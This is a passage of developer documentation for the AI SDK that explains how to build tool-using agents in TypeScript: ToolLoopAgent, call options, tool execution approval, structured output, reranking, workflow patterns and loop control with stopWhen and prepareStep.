instructions: 'You are a helpful weather assistant.',
tools: {
weather: weatherTool,
},
});
// Use the agent
const result = await weatherAgent.generate({
prompt: 'What is the weather in San Francisco?',
});
The agent automatically handles the tool execution loop:
- Calls the LLM with your prompt
- Executes any requested tool calls
- Adds results back to the conversation
- Repeats until complete (default stopWhen: stepCountIs(20))
Configuring Call Options
Call options let you pass type-safe runtime inputs to dynamically configure your agents. Use them to inject retrieved documents for RAG, select models based on request complexity, customize tool behavior per request, or adjust any agent setting based on context.
Without call options, you'd need to create multiple agents or handle configuration logic outside the agent. With call options, you define a schema once and modify agent behavior at runtime:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const supportAgent = new ToolLoopAgent({
model: __MODEL__,
callOptionsSchema: z.object({
userId: z.string(),
accountType: z.enum(['free', 'pro', 'enterprise']),
}),
instructions: 'You are a helpful customer support agent.',
prepareCall: ({ options, ...settings }) => ({
...settings,
instructions:
settings.instructions +
`\nUser context:
- Account type: ${options.accountType}
- User ID: ${options.userId}
Adjust your response based on the user's account level.`,
}),
});
// Pass options when calling the agent
const result = await supportAgent.generate({
prompt: 'How do I upgrade my account?',
options: {
userId: 'user_123',
accountType: 'free',
},
});
The options parameter is type-safe and will error if you don't provide it or pass incorrect types.
Call options enable dynamic agent configuration for several scenarios:
- RAG: Fetch relevant documents and inject them into prompts at runtime
- Dynamic model selection: Choose faster or more capable models based on request complexity
- Tool configuration: Adjust tools per request
- Provider options: Set reasoning effort, temperature, or other provider-specific settings dynamically
Learn more in the Configuring Call Options documentation.
UI Integration
Agents integrate seamlessly with React and other UI frameworks:
// Server-side API route
import { createAgentUIStreamResponse } from 'ai';
export async function POST(request: Request) {
const { messages } = await request.json();
return createAgentUIStreamResponse({
agent: weatherAgent,
messages,
});
}
// Client-side with type safety
import { useChat } from '@ai-sdk/react';
import { InferAgentUIMessage } from 'ai';
import { weatherAgent } from '@/agent/weather-agent';
type WeatherAgentUIMessage = InferAgentUIMessage<typeof weatherAgent>;
const { messages, sendMessage } = useChat<WeatherAgentUIMessage>();
Custom Agent Implementations
In AI SDK 6, Agent is an interface rather than a concrete class. While ToolLoopAgent provides a solid default implementation for most use cases, you can implement the Agent interface to build custom agent architectures:
import { Agent } from 'ai';
// Build your own multi-agent orchestrator that delegates to specialists
class Orchestrator implements Agent {
constructor(private subAgents: Record<string, Agent>) {
/* Implementation */
}
}
const orchestrator = new Orchestrator({
  // your subagents, keyed by name
});
This approach enables you to experiment with orchestrators, memory layers, custom stop conditions, and agent patterns tailored to your specific use case.
Tool Execution Approval
AI SDK 6 introduces a tool approval system that gives you control over when tools are executed.
Enable approval for a tool by setting needsApproval:
import { tool } from 'ai';
import { z } from 'zod';
export const weatherTool = tool({
description: 'Get the weather in a location',
inputSchema: z.object({
city: z.string(),
}),
needsApproval: true, // Require user approval
execute: async ({ city }) => {
const weather = await fetchWeather(city);
return weather;
},
});
Dynamic Approval
Make approval decisions based on tool input:
export const paymentTool = tool({
description: 'Process a payment',
inputSchema: z.object({
amount: z.number(),
recipient: z.string(),
}),
// Only require approval for large transactions
needsApproval: async ({ amount }) => amount > 1000,
execute: async ({ amount, recipient }) => {
return await processPayment(amount, recipient);
},
});
Client-Side Approval UI
Handle approval requests in your UI:
export function WeatherToolView({ invocation, addToolApprovalResponse }) {
if (invocation.state === 'approval-requested') {
return (
<div>
<p>Can I retrieve the weather for {invocation.input.city}?</p>
<button
onClick={() =>
addToolApprovalResponse({
id: invocation.approval.id,
approved: true,
})
}
>
Approve
</button>
<button
onClick={() =>
addToolApprovalResponse({
id: invocation.approval.id,
approved: false,
})
}
>
Deny
</button>
</div>
);
}
if (invocation.state === 'output-available') {
return (
<div>
Weather: {invocation.output.weather}
Temperature: {invocation.output.temperature}°F
</div>
);
}
// Handle other states...
}
Auto-Submit After Approvals
Automatically continue the conversation once approvals are handled:
import { useChat } from '@ai-sdk/react';
import { lastAssistantMessageIsCompleteWithApprovalResponses } from 'ai';
const { messages, addToolApprovalResponse } = useChat({
sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithApprovalResponses,
});
Structured Output (Stable)
AI SDK 6 stabilizes structured output support for agents, enabling you to generate structured data alongside multi-step tool calling.
Previously, you could only generate structured outputs with generateObject and streamObject, which didn't support tool calling. Now ToolLoopAgent (and generateText / streamText) can combine both capabilities using the output parameter:
import { Output, ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
city: z.string(),
}),
execute: async ({ city }) => {
return { temperature: 72, condition: 'sunny' };
},
}),
},
output: Output.object({
schema: z.object({
summary: z.string(),
temperature: z.number(),
recommendation: z.string(),
}),
}),
});
const { output } = await agent.generate({
prompt: 'What is the weather in San Francisco and what should I wear?',
});
// The agent calls the weather tool AND returns structured output
console.log(output);
// {
// summary: "It's sunny in San Francisco",
// temperature: 72,
// recommendation: "Wear light clothing and sunglasses"
// }
Output Types
The Output object provides multiple strategies for structured generation:
- Output.object(): Generate structured objects with Zod schemas
- Output.array(): Generate arrays of structured objects
- Output.choice(): Select from a specific set of options
- Output.text(): Generate plain text (default behavior)
Streaming Structured Output
Use agent.stream() to stream structured output as it's being generated:
import { ToolLoopAgent, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const profileAgent = new ToolLoopAgent({
model: __MODEL__,
instructions: 'Generate realistic person profiles.',
output: Output.object({
schema: z.object({
name: z.string(),
age: z.number(),
occupation: z.string(),
}),
}),
});
const { partialOutputStream } = await profileAgent.stream({
prompt: 'Generate a person profile.',
});
for await (const partial of partialOutputStream) {
console.log(partial);
// { name: "John" }
// { name: "John", age: 30 }
// { name: "John", age: 30, occupation: "Engineer" }
}
Support in generateText and streamText
Structured outputs are also supported in generateText and streamText functions, allowing you to use this feature outside of agents when needed.
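A minimal sketch (this assumes generateText accepts the same Output-based output parameter shown in the agent examples above; the model ID is illustrative):
import { generateText, Output } from 'ai';
import { z } from 'zod';

const { output } = await generateText({
  model: 'openai/gpt-4o',
  output: Output.object({
    schema: z.object({
      title: z.string(),
      tags: z.array(z.string()),
    }),
  }),
  prompt: 'Suggest a title and tags for a post about TypeScript generics.',
});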
Reranking Support
AI SDK 6 introduces native support for reranking, a technique that improves search relevance by reordering documents based on their relationship to a query.
Unlike embedding-based similarity search, reranking models are specifically trained to understand query-document relationships, producing more accurate relevance scores:
import { rerank } from 'ai';
import { cohere } from '@ai-sdk/cohere';
const documents = [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
];
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents,
query: 'talk about rain',
topN: 2,
});
console.log(ranking);
// [
// { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
// { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]
Structured Document Reranking
Reranking also supports structured documents, making it ideal for searching through databases, emails, or other structured content:
import { rerank } from 'ai';
import { cohere } from '@ai-sdk/cohere';
const documents = [
{
from: 'Paul Doe',
subject: 'Follow-up',
text: 'We are happy to give you a discount of 20% on your next order.',
},
{
from: 'John McGill',
subject: 'Missing Info',
text: 'Sorry, but here is the pricing information from Oracle: $5000/month',
},
];
const { rerankedDocuments } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents,
query: 'Which pricing did we get from Oracle?',
topN: 1,
});
console.log(rerankedDocuments[0]);
// { from: 'John McGill', subject: 'Missing Info', text: '...' }
Supported Providers
Several providers offer reranking models, including Cohere (used in the examples above).
Image Editing Support
Native support for image editing and generation workflows is coming soon. This will enable:
- Image-to-image transformations
- Multi-modal editing with text prompts
Migration from AI SDK 5.x
AI SDK 6 is expected to have minimal breaking changes. The version bump is due to the v3 Language Model Specification, but most AI SDK 5 code will work with little or no modification.
Timeline
AI SDK 6 Beta: Available now
Stable Release: End of 2025
title: Agents description: Learn how to build agents with the AI SDK.
Agents
Agents are large language models (LLMs) that use tools in a loop to accomplish tasks.
These components work together:
- LLMs process input and decide the next action
- Tools extend capabilities beyond text generation (reading files, calling APIs, writing to databases)
- Loop orchestrates execution through:
- Context management - Maintaining conversation history and deciding what the model sees (input) at each step
- Stopping conditions - Determining when the loop (task) is complete
Agent Class
The Agent class handles these three components. Here's an agent that uses multiple tools in a loop to accomplish a task:
import { Experimental_Agent as Agent, stepCountIs, tool } from 'ai';
import { z } from 'zod';
const weatherAgent = new Agent({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location (in Fahrenheit)',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
convertFahrenheitToCelsius: tool({
description: 'Convert temperature from Fahrenheit to Celsius',
inputSchema: z.object({
temperature: z.number().describe('Temperature in Fahrenheit'),
}),
execute: async ({ temperature }) => {
const celsius = Math.round((temperature - 32) * (5 / 9));
return { celsius };
},
}),
},
stopWhen: stepCountIs(20),
});
const result = await weatherAgent.generate({
prompt: 'What is the weather in San Francisco in celsius?',
});
console.log(result.text); // agent's final answer
console.log(result.steps); // steps taken by the agent
The agent automatically:
- Calls the weather tool to get the temperature in Fahrenheit
- Calls convertFahrenheitToCelsius to convert it
- Generates a final text response with the result
The Agent class handles the loop, context management, and stopping conditions.
Why Use the Agent Class?
The Agent class is the recommended approach for building agents with the AI SDK because it:
- Reduces boilerplate - Manages loops and message arrays
- Improves reusability - Define once, use throughout your application
- Simplifies maintenance - Single place to update agent configuration
For most use cases, start with the Agent class. Use core functions (generateText, streamText) when you need explicit control over each step for complex structured workflows.
Structured Workflows
Agents are flexible and powerful, but non-deterministic. When you need reliable, repeatable outcomes with explicit control flow, use core functions with structured workflow patterns combining:
- Conditional statements for explicit branching
- Standard functions for reusable logic
- Error handling for robustness
- Explicit control flow for predictability
Explore workflow patterns to learn more about building structured, reliable systems.
Next Steps
- Building Agents - Guide to creating agents with the Agent class
- Workflow Patterns - Structured patterns using core functions for complex workflows
- Loop Control - Execution control with stopWhen and prepareStep
title: Building Agents description: Complete guide to creating agents with the Agent class.
Building Agents
The Agent class provides a structured way to encapsulate LLM configuration, tools, and behavior into reusable components. It handles the agent loop for you, allowing the LLM to call tools multiple times in sequence to accomplish complex tasks. Define agents once and use them across your application.
Why Use the Agent Class?
When building AI applications, you often need to:
- Reuse configurations - Same model settings, tools, and prompts across different parts of your application
- Maintain consistency - Ensure the same behavior and capabilities throughout your codebase
- Simplify API routes - Reduce boilerplate in your endpoints
- Type safety - Get full TypeScript support for your agent's tools and outputs
The Agent class provides a single place to define your agent's behavior.
Creating an Agent
Define an agent by instantiating the Agent class with your desired configuration:
import { Experimental_Agent as Agent } from 'ai';
const myAgent = new Agent({
model: __MODEL__,
system: 'You are a helpful assistant.',
tools: {
// Your tools here
},
});
Configuration Options
The Agent class accepts all the same settings as generateText and streamText. Configure:
Model and System Prompt
import { Experimental_Agent as Agent } from 'ai';
const agent = new Agent({
model: __MODEL__,
system: 'You are an expert software engineer.',
});
Tools
Provide tools that the agent can use to accomplish tasks:
import { Experimental_Agent as Agent, tool } from 'ai';
import { z } from 'zod';
const codeAgent = new Agent({
model: __MODEL__,
tools: {
runCode: tool({
description: 'Execute Python code',
inputSchema: z.object({
code: z.string(),
}),
execute: async ({ code }) => {
// Execute code and return result
return { output: 'Code executed successfully' };
},
}),
},
});
Loop Control
By default, agents run for a single step (stopWhen: stepCountIs(1)). In each step, the model either generates text or calls a tool. If it generates text, the agent completes. If it calls a tool, the AI SDK executes that tool.
To let agents call multiple tools in sequence, configure stopWhen to allow more steps. After each tool execution, the agent triggers a new generation where the model can call another tool or generate text:
import { Experimental_Agent as Agent, stepCountIs } from 'ai';
const agent = new Agent({
model: __MODEL__,
stopWhen: stepCountIs(20), // Allow up to 20 steps
});
Each step represents one generation (which results in either text or a tool call). The loop continues until:
- The model generates text instead of calling a tool, or
- A stop condition is met
You can combine multiple conditions:
import { Experimental_Agent as Agent, stepCountIs } from 'ai';
const agent = new Agent({
model: __MODEL__,
stopWhen: [
stepCountIs(20), // Maximum 20 steps
yourCustomCondition(), // Custom logic for when to stop
],
});
Learn more about loop control and stop conditions.
Tool Choice
Control how the agent uses tools:
import { Experimental_Agent as Agent } from 'ai';
const agent = new Agent({
model: __MODEL__,
tools: {
// your tools here
},
toolChoice: 'required', // Force tool use
// or toolChoice: 'none' to disable tools
// or toolChoice: 'auto' (default) to let the model decide
});
You can also force the use of a specific tool:
import { Experimental_Agent as Agent } from 'ai';
const agent = new Agent({
model: __MODEL__,
tools: {
weather: weatherTool,
cityAttractions: attractionsTool,
},
toolChoice: {
type: 'tool',
toolName: 'weather', // Force the weather tool to be used
},
});
Structured Output
Define structured output schemas:
import { Experimental_Agent as Agent, Output, stepCountIs } from 'ai';
import { z } from 'zod';
const analysisAgent = new Agent({
model: __MODEL__,
experimental_output: Output.object({
schema: z.object({
sentiment: z.enum(['positive', 'neutral', 'negative']),
summary: z.string(),
keyPoints: z.array(z.string()),
}),
}),
stopWhen: stepCountIs(10),
});
const { experimental_output: output } = await analysisAgent.generate({
prompt: 'Analyze customer feedback from the last quarter',
});
Define Agent Behavior with System Prompts
System prompts define your agent's behavior, personality, and constraints. They set the context for all interactions and guide how the agent responds to user queries and uses tools.
Basic System Prompts
Set the agent's role and expertise:
const agent = new Agent({
model: __MODEL__,
system:
'You are an expert data analyst. You provide clear insights from complex data.',
});
Detailed Behavioral Instructions
Provide specific guidelines for agent behavior:
const codeReviewAgent = new Agent({
model: __MODEL__,
system: `You are a senior software engineer conducting code reviews.
Your approach:
- Focus on security vulnerabilities first
- Identify performance bottlenecks
- Suggest improvements for readability and maintainability
- Be constructive and educational in your feedback
- Always explain why something is an issue and how to fix it`,
});
Constrain Agent Behavior
Set boundaries and ensure consistent behavior:
const customerSupportAgent = new Agent({
model: __MODEL__,
system: `You are a customer support specialist for an e-commerce platform.
Rules:
- Never make promises about refunds without checking the policy
- Always be empathetic and professional
- If you don't know something, say so and offer to escalate
- Keep responses concise and actionable
- Never share internal company information`,
tools: {
checkOrderStatus,
lookupPolicy,
createTicket,
},
});
Tool Usage Instructions
Guide how the agent should use available tools:
const researchAgent = new Agent({
model: __MODEL__,
system: `You are a research assistant with access to search and document tools.
When researching:
1. Always start with a broad search to understand the topic
2. Use document analysis for detailed information
3. Cross-reference multiple sources before drawing conclusions
4. Cite your sources when presenting information
5. If information conflicts, present both viewpoints`,
tools: {
webSearch,
analyzeDocument,
extractQuotes,
},
});
Format and Style Instructions
Control the output format and communication style:
const technicalWriterAgent = new Agent({
model: __MODEL__,
system: `You are a technical documentation writer.
Writing style:
- Use clear, simple language
- Avoid jargon unless necessary
- Structure information with headers and bullet points
- Include code examples where relevant
- Write in second person ("you" instead of "the user")
Always format responses in Markdown.`,
});
Using an Agent
Once defined, you can use your agent in three ways:
Generate Text
Use generate() for one-time text generation:
const result = await myAgent.generate({
prompt: 'What is the weather like?',
});
console.log(result.text);
Stream Text
Use stream() for streaming responses:
const stream = myAgent.stream({
prompt: 'Tell me a story',
});
for await (const chunk of stream.textStream) {
console.log(chunk);
}
Respond to UI Messages
Use respond() to create API responses for client applications:
// In your API route (e.g., app/api/chat/route.ts)
import { validateUIMessages } from 'ai';
export async function POST(request: Request) {
const { messages } = await request.json();
return myAgent.respond({
messages: await validateUIMessages({ messages }),
});
}
End-to-end Type Safety
You can infer types for your Agent's UIMessages:
import {
Experimental_Agent as Agent,
Experimental_InferAgentUIMessage as InferAgentUIMessage,
} from 'ai';
const myAgent = new Agent({
// ... configuration
});
// Infer the UIMessage type for UI components or persistence
export type MyAgentUIMessage = InferAgentUIMessage<typeof myAgent>;
Use this type in your client components with useChat:
'use client';
import { useChat } from '@ai-sdk/react';
import type { MyAgentUIMessage } from '@/agent/my-agent';
export function Chat() {
const { messages } = useChat<MyAgentUIMessage>();
// Full type safety for your messages and tools
}
Next Steps
Now that you understand building agents, you can:
- Explore workflow patterns for structured patterns using core functions
- Learn about loop control for advanced execution control
- See manual loop examples for custom workflow implementations
title: Workflow Patterns description: Learn workflow patterns for building reliable agents with the AI SDK.
Workflow Patterns
Combine the building blocks from the overview with these patterns to add structure and reliability to your agents:
- Sequential Processing - Steps executed in order
- Parallel Processing - Independent tasks run simultaneously
- Evaluation/Feedback Loops - Results checked and improved iteratively
- Orchestration - Coordinating multiple components
- Routing - Directing work based on context
Choose Your Approach
Consider these key factors:
- Flexibility vs Control - How much freedom does the LLM need vs how tightly you must constrain its actions?
- Error Tolerance - What are the consequences of mistakes in your use case?
- Cost Considerations - More complex systems typically mean more LLM calls and higher costs
- Maintenance - Simpler architectures are easier to debug and modify
Start with the simplest approach that meets your needs. Add complexity only when required by:
- Breaking down tasks into clear steps
- Adding tools for specific capabilities
- Implementing feedback loops for quality control
- Introducing multiple agents for complex workflows
Let's look at examples of these patterns in action.
Patterns with Examples
These patterns, adapted from Anthropic's guide on building effective agents, serve as building blocks you can combine to create comprehensive workflows. Each pattern addresses specific aspects of task execution. Combine them thoughtfully to build reliable solutions for complex problems.
Sequential Processing (Chains)
The simplest workflow pattern executes steps in a predefined order. Each step's output becomes input for the next step, creating a clear chain of operations. Use this pattern for tasks with well-defined sequences, like content generation pipelines or data transformation processes.
import { generateText, generateObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function generateMarketingCopy(input: string) {
const model = __MODEL__;
// First step: Generate marketing copy
const { text: copy } = await generateText({
model,
prompt: `Write persuasive marketing copy for: ${input}. Focus on benefits and emotional appeal.`,
});
// Perform quality check on copy
const { object: qualityMetrics } = await generateObject({
model,
schema: z.object({
hasCallToAction: z.boolean(),
emotionalAppeal: z.number().min(1).max(10),
clarity: z.number().min(1).max(10),
}),
prompt: `Evaluate this marketing copy for:
1. Presence of call to action (true/false)
2. Emotional appeal (1-10)
3. Clarity (1-10)
Copy to evaluate: ${copy}`,
});
// If quality check fails, regenerate with more specific instructions
if (
!qualityMetrics.hasCallToAction ||
qualityMetrics.emotionalAppeal < 7 ||
qualityMetrics.clarity < 7
) {
const { text: improvedCopy } = await generateText({
model,
prompt: `Rewrite this marketing copy with:
${!qualityMetrics.hasCallToAction ? '- A clear call to action' : ''}
${qualityMetrics.emotionalAppeal < 7 ? '- Stronger emotional appeal' : ''}
${qualityMetrics.clarity < 7 ? '- Improved clarity and directness' : ''}
Original copy: ${copy}`,
});
return { copy: improvedCopy, qualityMetrics };
}
return { copy, qualityMetrics };
}
Routing
This pattern lets the model decide which path to take through a workflow based on context and intermediate results. The model acts as an intelligent router, directing the flow of execution between different branches of your workflow. Use this when handling varied inputs that require different processing approaches. In the example below, the first LLM call's results determine the second call's model size and system prompt.
import { generateObject, generateText } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function handleCustomerQuery(query: string) {
const model = __MODEL__;
// First step: Classify the query type
const { object: classification } = await generateObject({
model,
schema: z.object({
reasoning: z.string(),
type: z.enum(['general', 'refund', 'technical']),
complexity: z.enum(['simple', 'complex']),
}),
prompt: `Classify this customer query:
${query}
Determine:
1. Query type (general, refund, or technical)
2. Complexity (simple or complex)
3. Brief reasoning for classification`,
});
// Route based on classification
// Set model and system prompt based on query type and complexity
const { text: response } = await generateText({
model:
classification.complexity === 'simple'
? 'openai/gpt-4o-mini'
: 'openai/o4-mini',
system: {
general:
'You are an expert customer service agent handling general inquiries.',
refund:
'You are a customer service agent specializing in refund requests. Follow company policy and collect necessary information.',
technical:
'You are a technical support specialist with deep product knowledge. Focus on clear step-by-step troubleshooting.',
}[classification.type],
prompt: query,
});
return { response, classification };
}
Parallel Processing
Break down tasks into independent subtasks that execute simultaneously. This pattern uses parallel execution to improve efficiency while maintaining the benefits of structured workflows. For example, analyze multiple documents or process different aspects of a single input concurrently (like code review).
import { generateText, generateObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
// Example: Parallel code review with multiple specialized reviewers
async function parallelCodeReview(code: string) {
const model = __MODEL__;
// Run parallel reviews
const [securityReview, performanceReview, maintainabilityReview] =
await Promise.all([
generateObject({
model,
system:
'You are an expert in code security. Focus on identifying security vulnerabilities, injection risks, and authentication issues.',
schema: z.object({
vulnerabilities: z.array(z.string()),
riskLevel: z.enum(['low', 'medium', 'high']),
suggestions: z.array(z.string()),
}),
prompt: `Review this code:
${code}`,
}),
generateObject({
model,
system:
'You are an expert in code performance. Focus on identifying performance bottlenecks, memory leaks, and optimization opportunities.',
schema: z.object({
issues: z.array(z.string()),
impact: z.enum(['low', 'medium', 'high']),
optimizations: z.array(z.string()),
}),
prompt: `Review this code:
${code}`,
}),
generateObject({
model,
system:
'You are an expert in code quality. Focus on code structure, readability, and adherence to best practices.',
schema: z.object({
concerns: z.array(z.string()),
qualityScore: z.number().min(1).max(10),
recommendations: z.array(z.string()),
}),
prompt: `Review this code:
${code}`,
}),
]);
const reviews = [
{ ...securityReview.object, type: 'security' },
{ ...performanceReview.object, type: 'performance' },
{ ...maintainabilityReview.object, type: 'maintainability' },
];
// Aggregate results using another model instance
const { text: summary } = await generateText({
model,
system: 'You are a technical lead summarizing multiple code reviews.',
prompt: `Synthesize these code review results into a concise summary with key actions:
${JSON.stringify(reviews, null, 2)}`,
});
return { reviews, summary };
}
Orchestrator-Worker
A primary model (orchestrator) coordinates the execution of specialized workers. Each worker optimizes for a specific subtask, while the orchestrator maintains overall context and ensures coherent results. This pattern excels at complex tasks requiring different types of expertise or processing.
import { generateObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function implementFeature(featureRequest: string) {
// Orchestrator: Plan the implementation
const { object: implementationPlan } = await generateObject({
model: __MODEL__,
schema: z.object({
files: z.array(
z.object({
purpose: z.string(),
filePath: z.string(),
changeType: z.enum(['create', 'modify', 'delete']),
}),
),
estimatedComplexity: z.enum(['low', 'medium', 'high']),
}),
system:
'You are a senior software architect planning feature implementations.',
prompt: `Analyze this feature request and create an implementation plan:
${featureRequest}`,
});
// Workers: Execute the planned changes
const fileChanges = await Promise.all(
implementationPlan.files.map(async file => {
// Each worker is specialized for the type of change
const workerSystemPrompt = {
create:
'You are an expert at implementing new files following best practices and project patterns.',
modify:
'You are an expert at modifying existing code while maintaining consistency and avoiding regressions.',
delete:
'You are an expert at safely removing code while ensuring no breaking changes.',
}[file.changeType];
const { object: change } = await generateObject({
model: __MODEL__,
schema: z.object({
explanation: z.string(),
code: z.string(),
}),
system: workerSystemPrompt,
prompt: `Implement the changes for ${file.filePath} to support:
${file.purpose}
Consider the overall feature context:
${featureRequest}`,
});
return {
file,
implementation: change,
};
}),
);
return {
plan: implementationPlan,
changes: fileChanges,
};
}
Evaluator-Optimizer
Add quality control to workflows with dedicated evaluation steps that assess intermediate results. Based on the evaluation, the workflow proceeds, retries with adjusted parameters, or takes corrective action. This creates robust workflows capable of self-improvement and error recovery.
import { generateText, generateObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function translateWithFeedback(text: string, targetLanguage: string) {
let currentTranslation = '';
let iterations = 0;
const MAX_ITERATIONS = 3;
// Initial translation
const { text: translation } = await generateText({
model: __MODEL__,
system: 'You are an expert literary translator.',
prompt: `Translate this text to ${targetLanguage}, preserving tone and cultural nuances:
${text}`,
});
currentTranslation = translation;
// Evaluation-optimization loop
while (iterations < MAX_ITERATIONS) {
// Evaluate current translation
const { object: evaluation } = await generateObject({
model: __MODEL__,
schema: z.object({
qualityScore: z.number().min(1).max(10),
preservesTone: z.boolean(),
preservesNuance: z.boolean(),
culturallyAccurate: z.boolean(),
specificIssues: z.array(z.string()),
improvementSuggestions: z.array(z.string()),
}),
system: 'You are an expert in evaluating literary translations.',
prompt: `Evaluate this translation:
Original: ${text}
Translation: ${currentTranslation}
Consider:
1. Overall quality
2. Preservation of tone
3. Preservation of nuance
4. Cultural accuracy`,
});
// Check if quality meets threshold
if (
evaluation.qualityScore >= 8 &&
evaluation.preservesTone &&
evaluation.preservesNuance &&
evaluation.culturallyAccurate
) {
break;
}
// Generate improved translation based on feedback
const { text: improvedTranslation } = await generateText({
model: __MODEL__,
system: 'You are an expert literary translator.',
prompt: `Improve this translation based on the following feedback:
${evaluation.specificIssues.join('\n')}
${evaluation.improvementSuggestions.join('\n')}
Original: ${text}
Current Translation: ${currentTranslation}`,
});
currentTranslation = improvedTranslation;
iterations++;
}
return {
finalTranslation: currentTranslation,
iterationsRequired: iterations,
};
}
title: Loop Control description: Control agent execution with built-in loop management using stopWhen and prepareStep
Loop Control
You can control both the execution flow and the settings at each step of the agent loop. The AI SDK provides built-in loop control through two parameters: stopWhen for defining stopping conditions and prepareStep for modifying settings (model, tools, messages, and more) between steps.
Stop Conditions
The stopWhen parameter controls when execution stops if the last step contains tool results. By default, agents stop after a single step using stepCountIs(1).
When you provide stopWhen, the agent continues executing after tool calls until a stopping condition is met. When the condition is an array, execution stops when any of the conditions are met.
Use Built-in Conditions
The AI SDK provides several built-in stopping conditions:
import { Experimental_Agent as Agent, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
const agent = new Agent({
model: __MODEL__,
tools: {
// your tools
},
stopWhen: stepCountIs(20), // Stop after 20 steps maximum
});
const result = await agent.generate({
prompt: 'Analyze this dataset and create a summary report',
});
Combine Multiple Conditions
Combine multiple stopping conditions. The loop stops when it meets any condition:
import { Experimental_Agent as Agent, stepCountIs, hasToolCall } from 'ai';
__PROVIDER_IMPORT__;
const agent = new Agent({
model: __MODEL__,
tools: {
// your tools
},
stopWhen: [
stepCountIs(20), // Maximum 20 steps
hasToolCall('someTool'), // Stop after calling 'someTool'
],
});
const result = await agent.generate({
prompt: 'Research and analyze the topic',
});
Create Custom Conditions
Build custom stopping conditions for specific requirements:
import { Experimental_Agent as Agent, StopCondition, ToolSet } from 'ai';
__PROVIDER_IMPORT__;
const tools = {
// your tools
} satisfies ToolSet;
const hasAnswer: StopCondition<typeof tools> = ({ steps }) => {
// Stop when the model generates text containing "ANSWER:"
return steps.some(step => step.text?.includes('ANSWER:'));
};
const agent = new Agent({
model: __MODEL__,
tools,
stopWhen: hasAnswer,
});
const result = await agent.generate({
prompt: 'Find the answer and respond with "ANSWER: [your answer]"',
});
Custom conditions receive step information across all steps:
const budgetExceeded: StopCondition<typeof tools> = ({ steps }) => {
const totalUsage = steps.reduce(
(acc, step) => ({
inputTokens: acc.inputTokens + (step.usage?.inputTokens ?? 0),
outputTokens: acc.outputTokens + (step.usage?.outputTokens ?? 0),
}),
{ inputTokens: 0, outputTokens: 0 },
);
const costEstimate =
(totalUsage.inputTokens * 0.01 + totalUsage.outputTokens * 0.03) / 1000;
return costEstimate > 0.5; // Stop if cost exceeds $0.50
};
Prepare Step
The prepareStep callback runs before each step in the loop; any settings you don't return fall back to the initial configuration. Use it to modify settings, manage context, or implement dynamic behavior based on execution history.
Dynamic Model Selection
Switch models based on step requirements:
import { Experimental_Agent as Agent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new Agent({
model: 'openai/gpt-5.1-mini', // Default model
tools: {
// your tools
},
prepareStep: async ({ stepNumber, messages }) => {
// Use a stronger model for complex reasoning after initial steps
if (stepNumber > 2 && messages.length > 10) {
return {
model: __MODEL__,
};
}
// Continue with default settings
return {};
},
});
const result = await agent.generate({
prompt: '...',
});
Context Management
Manage growing conversation history in long-running loops:
import { Experimental_Agent as Agent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new Agent({
model: __MODEL__,
tools: {
// your tools
},
prepareStep: async ({ messages }) => {
// Keep only recent messages to stay within context limits
if (messages.length > 20) {
return {
messages: [
messages[0], // Keep system message
...messages.slice(-10), // Keep last 10 messages
],
};
}
return {};
},
});
const result = await agent.generate({
prompt: '...',
});
Tool Selection
Control which tools are available at each step:
import { Experimental_Agent as Agent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new Agent({
model: __MODEL__,
tools: {
search: searchTool,
analyze: analyzeTool,
summarize: summarizeTool,
},
prepareStep: async ({ stepNumber, steps }) => {
// Search phase (steps 0-2)
if (stepNumber <= 2) {
return {
activeTools: ['search'],
toolChoice: 'required',
};
}
// Analysis phase (steps 3-5)
if (stepNumber <= 5) {
return {
activeTools: ['analyze'],
};
}
// Summary phase (step 6+)
return {
activeTools: ['summarize'],
toolChoice: 'required',
};
},
});
const result = await agent.generate({
prompt: '...',
});
You can also force a specific tool to be used:
prepareStep: async ({ stepNumber }) => {
if (stepNumber === 0) {
// Force the search tool to be used first
return {
toolChoice: { type: 'tool', toolName: 'search' },
};
}
if (stepNumber === 5) {
// Force the summarize tool after analysis
return {
toolChoice: { type: 'tool', toolName: 'summarize' },
};
}
return {};
};
Message Modification
Transform messages before sending them to the model:
import { Experimental_Agent as Agent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new Agent({
model: __MODEL__,
tools: {
// your tools
},
prepareStep: async ({ messages, stepNumber }) => {
// Summarize tool results to reduce token usage
const processedMessages = messages.map(msg => {
if (msg.role === 'tool' && msg.content.length > 1000) {
return {
...msg,
content: summarizeToolResult(msg.content),
};
}
return msg;
});
return { messages: processedMessages };
},
});
const result = await agent.generate({
prompt: '...',
});
Access Step Information
Both stopWhen and prepareStep receive detailed information about the current execution:
prepareStep: async ({
model, // Current model configuration
stepNumber, // Current step number (0-indexed)
steps, // All previous steps with their results
messages, // Messages to be sent to the model
}) => {
// Access previous tool calls and results
const previousToolCalls = steps.flatMap(step => step.toolCalls);
const previousResults = steps.flatMap(step => step.toolResults);
// Make decisions based on execution history
if (previousToolCalls.some(call => call.toolName === 'dataAnalysis')) {
return {
toolChoice: { type: 'tool', toolName: 'reportGenerator' },
};
}
return {};
},
Manual Loop Control
